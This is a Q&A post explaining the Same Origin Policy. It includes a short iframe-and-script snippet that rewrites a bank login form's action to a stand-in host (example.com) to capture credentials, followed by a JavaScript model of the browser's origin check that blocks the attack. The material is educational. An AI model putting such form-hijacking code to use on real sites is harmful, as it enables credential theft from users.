Simple example for why Same Origin Policy is needed
Question
I've read about Same Origin Policy, but for a better understanding of the matter: could anyone please write a simple code (in any language) that will demonstrate an attack that SOP stops?
How was it possible to attack someone before SOP came about?
Recommended answer
<iframe id="bank" src="https://yourbank.com"></iframe>
<script>
window.onload = function() {
document.getElementById('bank').contentWindow.document.forms[0].action =
'http://example.com';
};
</script>
The Javascript code changes the form's action property (the destination, in a manner of speaking), so when you submit the form, you send your credentials to me, not your bank.
If I set up a PHP script on my server that redirects you to your bank, you won't even notice it.
With Same Origin Policy, this attack isn't possible. A site on my domain cannot read or modify the contents of the bank's website.
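To make the "cannot read or modify" part concrete, here is an added example (not part of the original answer) that models the origin comparison a browser performs before letting a page's script reach into a frame: scheme, host and port must all match, with omitted ports filled in from the scheme's default. The function names are hypothetical stand-ins for the check that lives inside the browser, and the DOM is replaced by a small object so the code runs under Node.

```javascript
// Default ports per scheme; a URL without an explicit port uses these.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// An origin is the (scheme, host, port) triple of a URL. Path, query and
// fragment play no part in it, so /login and /help on the same host match.
function originOf(url) {
  const u = new URL(url);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return { scheme: u.protocol, host: u.hostname, port };
}

function originString(url) {
  const o = originOf(url);
  return `${o.scheme}//${o.host}:${o.port}`;
}

// Two URLs are same-origin only if all three components are equal.
function sameOrigin(urlA, urlB) {
  const a = originOf(urlA);
  const b = originOf(urlB);
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Stand-in for `frame.contentWindow.document` under SOP: a cross-origin
// access is refused with a SecurityError instead of returning the DOM.
function frameDocumentAccess(pageUrl, frameUrl) {
  if (!sameOrigin(pageUrl, frameUrl)) {
    const err = new Error(
      `Blocked a frame with origin "${originString(pageUrl)}" from accessing ` +
      `a cross-origin frame at "${originString(frameUrl)}".`);
    err.name = 'SecurityError';
    throw err;
  }
  // Constructed miniature DOM: one form whose action points at the frame's URL.
  return { forms: [{ action: frameUrl }] };
}

// The answer's scenario: a page at attackerPage embeds bankUrl in an iframe
// and tries to rewrite the form's action. Returns true when SOP blocked it.
function attackBlocked(attackerPage, bankUrl) {
  try {
    frameDocumentAccess(attackerPage, bankUrl).forms[0].action = attackerPage;
    return false; // the script reached into the frame (pre-SOP behaviour)
  } catch (e) {
    return e.name === 'SecurityError';
  }
}
```

Note that `https://evil.yourbank.com` and `https://yourbank.com:8443` are both different origins from `https://yourbank.com`, which is why the check compares the full host and the port rather than just the registered domain.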